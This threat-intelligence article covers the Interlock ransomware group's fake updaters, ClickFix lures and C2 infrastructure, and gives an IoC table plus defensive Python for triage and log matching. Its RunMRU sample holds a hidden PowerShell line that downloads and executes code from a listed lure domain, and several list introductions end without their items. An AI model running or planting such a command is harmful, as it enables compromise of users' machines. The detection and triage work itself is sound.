The Interlock ransomware intrusion set has escalated its operations across North America and Europe with sophisticated techniques.
Unlike most current ransomware operations, Interlock is not run as Ransomware-as-a-Service (RaaS); it operates independently, focusing primarily on Big Game Hunting and double extortion campaigns.
This group’s activities have been closely monitored by cybersecurity firms such as Sekoia Threat Detection & Research (TDR) and others, revealing their evolving tactics and tools.
Interlock initiates its attack by compromising legitimate websites to host deceptive browser update pages, leveraging the trust users have in these platforms.
Here’s how the attack unfolds:
1. Fake Updater Deployment:
The ransomware’s initial access vector is a fake browser update hosted on compromised websites.
These updates appear to be legitimate Google Chrome or Microsoft Edge installers but are, in fact, PyInstaller-built executables. When a user executes this update, it:
2. PowerShell Backdoor:
The PowerShell script runs in a loop, repeatedly issuing HTTP requests to its command-and-control (C2) servers. It is designed for resilience, utilizing:
3. Command Execution:
The C2 server can issue various commands, including:
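The fake updater is described above as a PyInstaller-built executable posing as a Chrome or Edge installer. A cheap triage check a responder can run on a suspect download is to look for the archive "cookie" that PyInstaller's bootloader appends to every executable it builds. The Python below is an added example written for this page, not code from the Sekoia report or from Interlock's tooling. The cookie layout it parses (an 8-byte magic followed by four big-endian 32-bit integers and a 64-byte Python library name, 88 bytes in total) is PyInstaller's own format; the sample bytes and file names are constructed inline and are not real Interlock artifacts.

```python
"""Check whether a suspected 'browser installer' is a PyInstaller bundle.

Added example for this page (not code from the report or the malware).
PyInstaller's bootloader locates its embedded archive via a trailing
cookie; the layout below is PyInstaller's own format.
"""
import struct

PYI_MAGIC = b"MEI\014\013\012\013\016"    # 8-byte PyInstaller cookie magic
COOKIE_FMT = "!8siiii64s"                  # big-endian: magic, pkg_len, toc_off, toc_len, pyvers, pylib
COOKIE_LEN = struct.calcsize(COOKIE_FMT)   # 88 bytes


def find_pyinstaller_cookie(data: bytes):
    """Return the parsed cookie if `data` carries a PyInstaller archive, else None."""
    pos = data.rfind(PYI_MAGIC)            # the cookie is the last thing in the archive
    if pos < 0 or pos + COOKIE_LEN > len(data):
        return None
    _magic, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack_from(COOKIE_FMT, data, pos)
    return {
        "cookie_offset": pos,
        "package_len": pkg_len,
        "toc_offset": toc_off,
        "toc_len": toc_len,
        # pyvers is stored as major*100 + minor, e.g. 311 for Python 3.11
        "python_version": f"{pyvers // 100}.{pyvers % 100}",
        "pylib": pylib.rstrip(b"\0").decode("ascii", errors="replace"),
    }


def triage_download(filename: str, data: bytes) -> str:
    """Verdict for a file that claims to be a browser installer."""
    if not data.startswith(b"MZ"):
        return "not a PE image"
    cookie = find_pyinstaller_cookie(data)
    if cookie is None:
        return "PE without PyInstaller archive"
    return (f"{filename}: PyInstaller bundle (Python {cookie['python_version']}, "
            f"{cookie['pylib']}, archive {cookie['package_len']} bytes)")


# --- constructed samples (not real Interlock files) --------------------------
def make_sample(with_cookie: bool) -> bytes:
    body = b"MZ" + b"\0" * 510              # stub 'PE' header, padded to 512 bytes
    if with_cookie:
        body += b"A" * 1234                 # stand-in for the packed archive payload
        body += struct.pack(COOKIE_FMT, PYI_MAGIC, 1234 + COOKIE_LEN, 100, 50, 311, b"python311.dll")
    return body


if __name__ == "__main__":
    # file names are placeholders chosen for the example
    for name, blob in (("fake_chrome_update.exe", make_sample(True)),
                       ("real_installer.exe", make_sample(False))):
        print(triage_download(name, blob))
```

A PyInstaller cookie in something that claims to be a Chrome or Edge setup is a strong mismatch, because neither vendor ships Python-packaged installers, but the check only establishes packaging, not malice: plenty of legitimate internal tools are PyInstaller builds, so treat the result as a reason to detonate or hash-check the file, not as a verdict on its own.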
According to Sekoia's report, Interlock's operators employ a strategy of IP address clustering to maintain their infrastructure's resilience:
Each cluster typically includes:
Around January 2025, Interlock adopted the ClickFix technique:
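ClickFix lures (fake verification or error pages, here served from the domains listed in the IoC table such as microsoft-msteams[.]com and advanceipscaner[.]com) talk the victim into pasting a command into the Windows Run dialog themselves, which is why the technique sidesteps download-based controls. Commands entered into Run are recorded per user under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so that key is a quick place to look during triage. The Python below is an added example for this page, not code from the report or from the threat actor: the RunMRU contents are a constructed sample, the pasted command in it is illustrative rather than the actual Interlock command (the page does not reproduce it), and the heuristics are general ClickFix indicators, not Interlock specifics.

```python
"""Triage a user's RunMRU key for ClickFix-style pasted commands.

Added example for this page (not code from the report). Input is the
RunMRU key's values as exported from the registry; the sample below is
constructed and the pasted command in it is illustrative only.
"""
import re

# Hosts taken from the page's "ClickFix URLs" indicators (defanging removed).
CLICKFIX_HOSTS = {"microsoft-msteams.com", "microstteams.com", "advanceipscaner.com"}

# General heuristics for a command typed into Win+R by a ClickFix victim
# (assumptions about the technique in general, not Interlock specifics).
HEURISTICS = [
    ("interpreter", re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|"
                               r"bitsadmin|rundll32|regsvr32|msiexec)(\.exe)?\b", re.I)),
    ("download", re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|"
                            r"downloadfile|start-bitstransfer)\b|https?://", re.I)),
    ("execute", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("hidden", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("encoded", re.compile(r"-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    # lure pages often append a "verification" comment so the pasted text looks benign
    ("lure", re.compile(r"#.*\b(captcha|verif|not a robot|human)", re.I)),
]
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def parse_runmru(values: dict) -> list:
    """Return (slot, command) pairs, most recently used first.

    Each RunMRU value is '<command>\\1'; the MRUList value lists the slot
    letters in most-recent-first order. Slots missing from MRUList are
    appended in name order so nothing is silently dropped.
    """
    order = [s for s in values.get("MRUList", "") if s in values]
    leftovers = sorted(s for s in values if s != "MRUList" and s not in order)
    entries = []
    for slot in order + leftovers:
        raw = values[slot]
        entries.append((slot, raw[:-2] if raw.endswith("\\1") else raw))
    return entries


def classify(command: str) -> dict:
    """Score one Run-dialog command against the heuristics and the page's ClickFix hosts."""
    reasons = [name for name, rx in HEURISTICS if rx.search(command)]
    hosts = {h.lower() for h in HOST_RE.findall(command)}
    ioc_host = next(iter(sorted(hosts & CLICKFIX_HOSTS)), None)
    # a known lure host is decisive; otherwise require an interpreter plus one more signal
    suspicious = ioc_host is not None or ("interpreter" in reasons and len(reasons) >= 2)
    return {"command": command, "reasons": reasons, "clickfix_host": ioc_host, "suspicious": suspicious}


def triage_runmru(values: dict) -> list:
    results = []
    for slot, cmd in parse_runmru(values):
        entry = classify(cmd)
        entry["slot"] = slot
        results.append(entry)
    return results


# Constructed sample export of HKCU\...\Explorer\RunMRU (not a real capture;
# the command in slot "c" is illustrative, not the campaign's actual one).
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "iex (iwr https://microstteams.com/payload)" '
         "# I am not a robot - Verification ID: 0000\\1",
}

if __name__ == "__main__":
    for e in triage_runmru(SAMPLE_RUNMRU):
        flag = "SUSPICIOUS" if e["suspicious"] else "ok"
        print(f"[{flag}] slot={e['slot']} reasons={e['reasons']} "
              f"host={e['clickfix_host']} :: {e['command']}")
```

On a live host the values can be pulled with `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` for the current user; for other users or offline images read the same path under the loaded NTUSER.DAT hive. RunMRU only records what went through the Run dialog, so a victim who pasted into a terminal or the File Explorer address bar instead leaves nothing here; pair this with PowerShell script block logging and process creation telemetry for the parent-child chain rather than relying on it alone.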
The sophistication and evolution of Interlock’s tactics, from using fake browser updates to employing social engineering techniques like ClickFix, illustrate its adaptability and potential for further growth.
With a focus on high-value targets and the ability to evade traditional network security, Interlock remains a significant threat.
Cybersecurity measures must be updated continuously to counter the dynamic strategies of this ransomware group.
The following table lists the IoCs associated with Interlock’s activities:
Category | Indicator Type | Indicators |
---|---|---|
Fake Updater | SHA-256 | 576d07cc8919c68914bf08663e0afd00d9f9fbf5263b5cccbded5d373905a296, f962e15c6efebb3c29fe399bb168066042b616affddd83f72570c979184ec55c, … (additional hashes) |
ClickFix PowerShell Loaders | SHA-256 | 5c697162527a468a52c9e7b7dc3257dae4ae5142db62257753969d47f1db533e, eb587b2603dfc14b420865bb862fc905cb85fe7b4b5a781a19929fc2da88eb34, … (additional hashes) |
Interlock RAT | SHA-256 | 1105a3050e6c842fb9411d4f21fd6fdb119861c15f7743e244180a4e64b19b83, 299a8ef490076664675e3b52d6767bf89ddfa6accf291818c537a600a96290d2, … (additional hashes) |
Keylogger | SHA-256 | 5cbc2ae758043bb58664c28f32136e9cada50a8dc36c69670ddef0a3ef6757d8, df41085a8aa9ee9da6a03db08ad910b6ef5fcdc8fee7ebb19744331c5e70c782, … (additional hashes) |
BerserkStealer | SHA-256 | eb1cdf3118271d754cf0a1777652f83c3d11dc1f9a2b51e81e37602c43b47692, a5623b6a6f289bb328e4007385bdb1659407a9e825990a0faaef3625a2e782cf |
LummaStealer | SHA-256 | 4672fe8b37b71be834825a2477d956e0f76f7d2016c194f1538139d21703fd6e |
Windows Interlock ransomware | SHA-256 | 4a97599ff5823166112d9221d0e824af7896f6ca40cd3948ec129533787a3ea9, 33dc991e61ba714812aa536821b073e4274951a1e4a9bc68f71a802d034f4fb9, … (additional hashes) |
Small autoremove DLL used by the ransomware | SHA-256 | c9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f |
Linux Interlock ransomware | SHA-256 | 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f |
Data Leak Site | URL | http://ebhmkoohccl45qesdbvrjqtyro2hmhkmh6vkyfyjjzfllm3ix72aqaid[.]onion |
Backdoor C2 – Cluster 1 | IP Address | 23.95.182[.]59, 195.201.21[.]34, 159.223.46[.]184 |
Backdoor C2 – Cluster 2 | IP Address | 23.227.203[.]162, 65.109.226[.]176, 65.38.120[.]47 |
Backdoor C2 – Cluster 3 | IP Address | 216.245.184[.]181, 212.237.217[.]182, 168.119.96[.]41 |
Backdoor C2 – Cluster 4 | IP Address | 216.245.184[.]170, 65.108.80[.]58, 84.200.24[.]41 |
Backdoor C2 – Cluster 5 | IP Address | 206.206.123[.]65, 49.12.102[.]206, 193.149.180[.]158 |
Backdoor C2 – Cluster 6 | IP Address | 85.239.52[.]252, 5.252.177[.]228, 80.87.206[.]189 |
Backdoor C2 – Cluster 7 | IP Address | 65.108.80[.]58, 212.104.133[.]72, 140.82.14[.]117 |
Backdoor C2 – Cluster 8 | IP Address | 64.94.84[.]85, 49.12.69[.]80, 96.62.214[.]11 |
Backdoor C2 – Cluster 9 | IP Address | 177.136.225[.]153, 188.34.195[.]44, 45.61.136[.]202 |
Compromised URLs | URL | http://topsportracing[.]com/wp-az, http://topsportracing[.]com/az10, https://airbluefootgear[.]com/wp-includes/images/xits.php, … (additional URLs) |
ClickFix URLs | URL | https://microsoft-msteams[.]com/additional-check.html, https://microstteams[.]com/additional-check.html, https://advanceipscaner[.]com/additional-check.html, … (additional URLs) |
PowerShell backdoor C2 domains | URL | refrigerator-cheers-indicator-ferrari[.]trycloudflare.com, analytical-russell-cincinnati-settings[.]trycloudflare.com, … (additional URLs) |
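The C2 clusters above and the rest of the IoC table are published defanged (`[.]` in place of `.`), and the same IP, 65.108.80[.]58, is listed under both Cluster 4 and Cluster 7, so a lookup that keeps one category per indicator would lose information. The Python below is an added example for this page (not tooling from the report): it refangs a subset of the table, indexes each indicator against every category it appears under, indexes URL indicators by hostname as well so DNS and proxy logs that only record the host still match, and runs the result over constructed log lines. The log lines, internal addresses and file path are made up for the example; only the indicators are from the table.

```python
"""Refang the page's defanged indicators and match them against log lines.

Added example for this page, not tooling from the report. The indicators
are copied from the IoC table (a subset); the log lines are constructed.
"""
import re
from urllib.parse import urlsplit

IOC_TABLE = {
    "Backdoor C2 - Cluster 1": ["23.95.182[.]59", "195.201.21[.]34", "159.223.46[.]184"],
    "Backdoor C2 - Cluster 4": ["216.245.184[.]170", "65.108.80[.]58", "84.200.24[.]41"],
    "Backdoor C2 - Cluster 7": ["65.108.80[.]58", "212.104.133[.]72", "140.82.14[.]117"],
    "PowerShell backdoor C2 domains": [
        "refrigerator-cheers-indicator-ferrari[.]trycloudflare.com",
        "analytical-russell-cincinnati-settings[.]trycloudflare.com",
    ],
    "ClickFix URLs": [
        "https://microsoft-msteams[.]com/additional-check.html",
        "https://advanceipscaner[.]com/additional-check.html",
    ],
    "Fake Updater": ["576d07cc8919c68914bf08663e0afd00d9f9fbf5263b5cccbded5d373905a296"],
}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256_RE = re.compile(r"\b[0-9a-fA-F]{64}\b")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('1.2.3[.]4', 'hxxp://') back into its live form."""
    s = indicator.strip().replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
    if s.lower().startswith("hxxp"):
        s = "http" + s[4:]
    return s.lower()


def build_index(table: dict) -> dict:
    """Map each refanged indicator to every category it appears under."""
    index = {}
    for category, indicators in table.items():
        for raw in indicators:
            value = refang(raw)
            index.setdefault(value, []).append(category)
            # URL indicators are also keyed by hostname so logs that record
            # only the host (DNS, some proxies) still match
            if "://" in value:
                host = urlsplit(value).hostname
                if host:
                    index.setdefault(host, []).append(category)
    return index


def scan_line(line: str, index: dict) -> dict:
    """Return {category: [matched tokens]} for one log line."""
    tokens = set()
    for rx in (IPV4_RE, SHA256_RE, HOST_RE, URL_RE):
        tokens.update(m.group(0).lower() for m in rx.finditer(line))
    hits = {}
    for tok in sorted(tokens):
        for category in index.get(tok, []):
            hits.setdefault(category, []).append(tok)
    return hits


def scan_logs(lines, index: dict) -> list:
    """Return (line_number, category, tokens) for every indicator hit."""
    findings = []
    for n, line in enumerate(lines, 1):
        for category, toks in scan_line(line, index).items():
            findings.append((n, category, toks))
    return findings


# Constructed log lines (proxy, DNS and EDR style); not real telemetry.
LOG_LINES = [
    "2025-03-02T10:14:05Z proxy src=10.1.4.22 dst=23.95.182.59 GET http://23.95.182.59/ status=200",
    "2025-03-02T10:14:09Z dns client=10.1.4.22 query=refrigerator-cheers-indicator-ferrari.trycloudflare.com type=A",
    "2025-03-02T10:20:41Z proxy src=10.1.7.8 dst=65.108.80.58 POST http://65.108.80.58/ status=200",
    "2025-03-02T11:02:13Z proxy src=10.1.9.3 GET https://microsoft-msteams.com/additional-check.html status=200",
    "2025-03-02T11:05:00Z edr host=WS-021 image=C:\\Users\\a\\Downloads\\ChromeUpdate.exe "
    "sha256=576d07cc8919c68914bf08663e0afd00d9f9fbf5263b5cccbded5d373905a296",
    "2025-03-02T11:06:00Z proxy src=10.1.2.2 dst=142.250.74.46 GET https://www.google.com/ status=200",
]

if __name__ == "__main__":
    idx = build_index(IOC_TABLE)
    for n, category, toks in scan_logs(LOG_LINES, idx):
        print(f"line {n}: {category}: {', '.join(toks)}")
```

Two things to carry over into a real deployment: match the full trycloudflare.com hostnames rather than the parent domain, since Cloudflare Tunnel is used legitimately and a wholesale block will break things, and load the complete hash and URL lists from the report itself, because the table above is truncated ("… (additional hashes)") and the subset in this example is not a substitute for it.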